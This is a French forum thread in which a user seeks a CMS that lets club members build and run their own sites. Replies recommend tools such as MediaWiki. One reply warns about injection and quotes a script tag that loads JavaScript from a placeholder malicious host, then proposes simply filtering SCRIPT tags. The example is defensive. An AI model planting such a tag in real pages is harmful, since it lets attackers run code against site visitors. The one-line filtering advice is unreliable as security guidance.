Un site pour que les membres créent des sites
yann
-
guy64 Messages postés 1 Date d'inscription Statut Membre Dernière intervention -
guy64 Messages postés 1 Date d'inscription Statut Membre Dernière intervention -
Bonjour à toutes et à tous,
Je cherche un site du genre CMS, qui me permette déjà de créer mon propre site,
mais aussi que les membres qui s'enregistrent sur mon site puissent se créer un page ou un site,
qu'ils pourront administrer eux même.
Est ce que quelqu'un sait si ça existe et si possible comment ça s'appelle?
Merci d'avance.
Cordialement.
Yann.
mais aussi que les membres qui s'enregistrent sur mon site puissent se créer un page ou un site,
Merci d'avance.
Cordialement.
Yann.
A voir également:
- Un site pour que les membres créent des sites
- Site pour vendre des objets d'occasion - Guide
- Site de telechargement - Accueil - Outils
- Site comme coco - Accueil - Réseaux sociaux
- Site pour partager des photos - Guide
- Quel site remplace coco - Accueil - Réseaux sociaux
10 réponses
bonjour
parti comme c'est parti ... cela va donner encore un site qui proposera des "services" de sites en ligne, difficilement référençables, comme il en existe des centaines !
je viens d'avoir cette semaine 3 cas de ce genre : les gens en ont marre de se faire arnaquer !
rien de mieux que d'avoir son site, personnel, sur son hébergeur, et toute les possibilités à portée de main ... passer par un tiers (de par expérience) ne pose que des problèmes ...
b g
parti comme c'est parti ... cela va donner encore un site qui proposera des "services" de sites en ligne, difficilement référençables, comme il en existe des centaines !
je viens d'avoir cette semaine 3 cas de ce genre : les gens en ont marre de se faire arnaquer !
rien de mieux que d'avoir son site, personnel, sur son hébergeur, et toute les possibilités à portée de main ... passer par un tiers (de par expérience) ne pose que des problèmes ...
b g
Je vois peut-être ce que tu veux faire.
Tu veux faire un genre de système de blog mais ou le membre pourra crée sa propre ou ses propres pages mais en HTML et CSS.
Ce que je te conseille c'est les bases de données qui stockeront les codes des pages pour l'afficher ensuite dans une page unique avec paramètre d'URL qui choisira l'enregistrement a sélectionner (http://www.tonsite.com/voir_page.php?id=3).
Il faudra aussi que tu fasse gaffe au attaques par injection souvent en important un script VB et JS qui pourront piraté ton site de ce genre
Pour ça tu peux filtrer les balises SCRIPT avec un fonction JS ou PHP.
Tu veux faire un genre de système de blog mais ou le membre pourra crée sa propre ou ses propres pages mais en HTML et CSS.
Ce que je te conseille c'est les bases de données qui stockeront les codes des pages pour l'afficher ensuite dans une page unique avec paramètre d'URL qui choisira l'enregistrement a sélectionner (http://www.tonsite.com/voir_page.php?id=3).
Il faudra aussi que tu fasse gaffe au attaques par injection souvent en important un script VB et JS qui pourront piraté ton site de ce genre
<SCRIPT src="http://sitevirus.com/attaque.js" type="text/javascript"></script>
Pour ça tu peux filtrer les balises SCRIPT avec un fonction JS ou PHP.
Bonjour et merci de ta réponse si rapide. En fait j'ai vu Xoops avec un module, mais c'est vraiment pas terrible.
En fait je me débrouille en php, mais je suis pas codeur. Donc je cherche plutôt un cms opensource.
Si tu vois à peu près ce que je cherche...
Merci.
En fait je me débrouille en php, mais je suis pas codeur. Donc je cherche plutôt un cms opensource.
Si tu vois à peu près ce que je cherche...
Merci.
Salut,
regarde http://www.comscripts.com/scripts/php.mon-portfolio.2328.html
Qu'est-ce que Mon_Portfolio ?
* C'est une page Web dynamique et administrable via un panneau d'administration simple et clair, qui pourrait s'apparenter à un block.
Sauf qu'ici c'est complètement customisable au niveau de l'interface graphique et des fonctionnalités.
Que propose ce mini site ?
* Il vous permettra de gérer des liens
* Il vous permettra de gérer plusieurs pages
* Il vous permettra de gérer un espace membres
* Il vous permettra de gérer un calendrier
* Il vous permettra de gérer une boutique
* Il vous permettra de gérer des news
* Il vous permettra de gérer un flux rss
* Il vous permettra de donnez des droits de lecture sur les article
* Il vous permettra de gérer un espace de présentation et autres...
Les avantages ?
* Il n'a pas besoin de base de données pour fonctionner
* Il est dynamique
* Il est codé en PHP
* Il est très léger et très facile de prise en main
* Il est très facile à paramétrer
* Il est hyper rapide
* Il est trés bien sécurisé
* Il est totalement en Français
* Il est customisable à volonté en coding et design
* Il ne demande pas de retourner sur votre FTP pour changer de skin, un formulaire d'installation est inclu
Il inclu un éditeur HTML complet pour créer vos pages !
A+
regarde http://www.comscripts.com/scripts/php.mon-portfolio.2328.html
Qu'est-ce que Mon_Portfolio ?
* C'est une page Web dynamique et administrable via un panneau d'administration simple et clair, qui pourrait s'apparenter à un block.
Sauf qu'ici c'est complètement customisable au niveau de l'interface graphique et des fonctionnalités.
Que propose ce mini site ?
* Il vous permettra de gérer des liens
* Il vous permettra de gérer plusieurs pages
* Il vous permettra de gérer un espace membres
* Il vous permettra de gérer un calendrier
* Il vous permettra de gérer une boutique
* Il vous permettra de gérer des news
* Il vous permettra de gérer un flux rss
* Il vous permettra de donnez des droits de lecture sur les article
* Il vous permettra de gérer un espace de présentation et autres...
Les avantages ?
* Il n'a pas besoin de base de données pour fonctionner
* Il est dynamique
* Il est codé en PHP
* Il est très léger et très facile de prise en main
* Il est très facile à paramétrer
* Il est hyper rapide
* Il est trés bien sécurisé
* Il est totalement en Français
* Il est customisable à volonté en coding et design
* Il ne demande pas de retourner sur votre FTP pour changer de skin, un formulaire d'installation est inclu
Il inclu un éditeur HTML complet pour créer vos pages !
A+
Salut Guy,
Merci pour ta réponse qui est on ne peut plus limpide, d'ailleurs je test Mon Portfolio.
Est ce que ce cms permet une autonomie des membres? C'est à dire qu'ils pourront créer leur propre site tout seuls et mettre en page le tout?
Le mieux serait s'ils peuvent aussi choisir le nom du dossier pour leur site : comme un sous-domaine.
Je crois que j'arrive pas à m'exprimer.... lol
Merci
Merci pour ta réponse qui est on ne peut plus limpide, d'ailleurs je test Mon Portfolio.
Est ce que ce cms permet une autonomie des membres? C'est à dire qu'ils pourront créer leur propre site tout seuls et mettre en page le tout?
Le mieux serait s'ils peuvent aussi choisir le nom du dossier pour leur site : comme un sous-domaine.
Je crois que j'arrive pas à m'exprimer.... lol
Merci
Salut Yann,
Essai de mieux expliquer...
1 - Quel genre de site veux tu leur permettre de faire ?
2 - Veux tu héberger leur site en sous domaine ?
Tu devras leur demander via un formulaire
http://www.ge-net.ch/page/rw-wfco-int-0.html (générateur de formulaire en ligne)
le nom du dossier ou tu mettras le script pour qu'ils réalisent leur site...
le lien pour une petite faq pour MP http://ekintza.net.free.fr/faq-blog/
A+
Essai de mieux expliquer...
1 - Quel genre de site veux tu leur permettre de faire ?
2 - Veux tu héberger leur site en sous domaine ?
Tu devras leur demander via un formulaire
http://www.ge-net.ch/page/rw-wfco-int-0.html (générateur de formulaire en ligne)
le nom du dossier ou tu mettras le script pour qu'ils réalisent leur site...
le lien pour une petite faq pour MP http://ekintza.net.free.fr/faq-blog/
A+
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
En gros tu veux un wiki
Tu peux essayer de telecharger mediawiki sur http://mediawiki.org, c'est un moteur de wiki libre et gratuit assez puissant et surtout supporté par une grosse communauté de developpeurs. Donc continuellement mis a jour.
En gros tu veux un wiki
Tu peux essayer de telecharger mediawiki sur http://mediawiki.org, c'est un moteur de wiki libre et gratuit assez puissant et surtout supporté par une grosse communauté de developpeurs. Donc continuellement mis a jour.
Salut Guy,
Je voudrais qu'on puisse mettre par site :
- une image et un titre dans le header,
- un menu de liens,
- du contenu,
- un footer,
- des meta-tags.
TOUT serait administrable par le membre.
Je pensais aussi passer par des formulaires mais d'abord existe-il la même chose que je cherche? même en anglais...
Sinon pour le nom du dossier j'ai un exemple :
- Le gars veut créer son site et qu'il s'appel forum, il s'enregistre et par un formulaire, il va mettre "forum" pour le nom de son site. Au final l'adresse complète menant vers son site serait : www.monsite.fr/forum/
Tu vois ce que je cherche?
Je voudrais qu'on puisse mettre par site :
- une image et un titre dans le header,
- un menu de liens,
- du contenu,
- un footer,
- des meta-tags.
TOUT serait administrable par le membre.
Je pensais aussi passer par des formulaires mais d'abord existe-il la même chose que je cherche? même en anglais...
Sinon pour le nom du dossier j'ai un exemple :
- Le gars veut créer son site et qu'il s'appel forum, il s'enregistre et par un formulaire, il va mettre "forum" pour le nom de son site. Au final l'adresse complète menant vers son site serait : www.monsite.fr/forum/
Tu vois ce que je cherche?
non, ce serait une préférence.
Mais il faudrait une solution quand même pour qu'on puisse accéder à leurs sites "facilement".
C'est à dire une adresse de page à la suite de mon nom de domaine, quelque chose quoi.
Tant pis si t'as pas, mais ça a quand même été très gentil à toi de tenter de m'aider.
Mais il faudrait une solution quand même pour qu'on puisse accéder à leurs sites "facilement".
C'est à dire une adresse de page à la suite de mon nom de domaine, quelque chose quoi.
Tant pis si t'as pas, mais ça a quand même été très gentil à toi de tenter de m'aider.
Pourquoi faut-il toujours que les gens interprètent sans savoir de quoi ils parlent?
C'est un site pour un club tuning pour que chaque gars puisse tout mettre sur sa caisse.
C'est dingue ça ! Et si je parle pas du contenu du site c'est parce que ça regarde qui je veux.
Et d'ailleurs je remercie encore les gens qui tentent de m'aider gratuitement !
Si vous avez une idée pour m'aider à faire ce que je veux je vous remercie d'avance de me la faire parvenir à travers ce forum.
Yann.
C'est un site pour un club tuning pour que chaque gars puisse tout mettre sur sa caisse.
C'est dingue ça ! Et si je parle pas du contenu du site c'est parce que ça regarde qui je veux.
Et d'ailleurs je remercie encore les gens qui tentent de m'aider gratuitement !
Si vous avez une idée pour m'aider à faire ce que je veux je vous remercie d'avance de me la faire parvenir à travers ce forum.
Yann.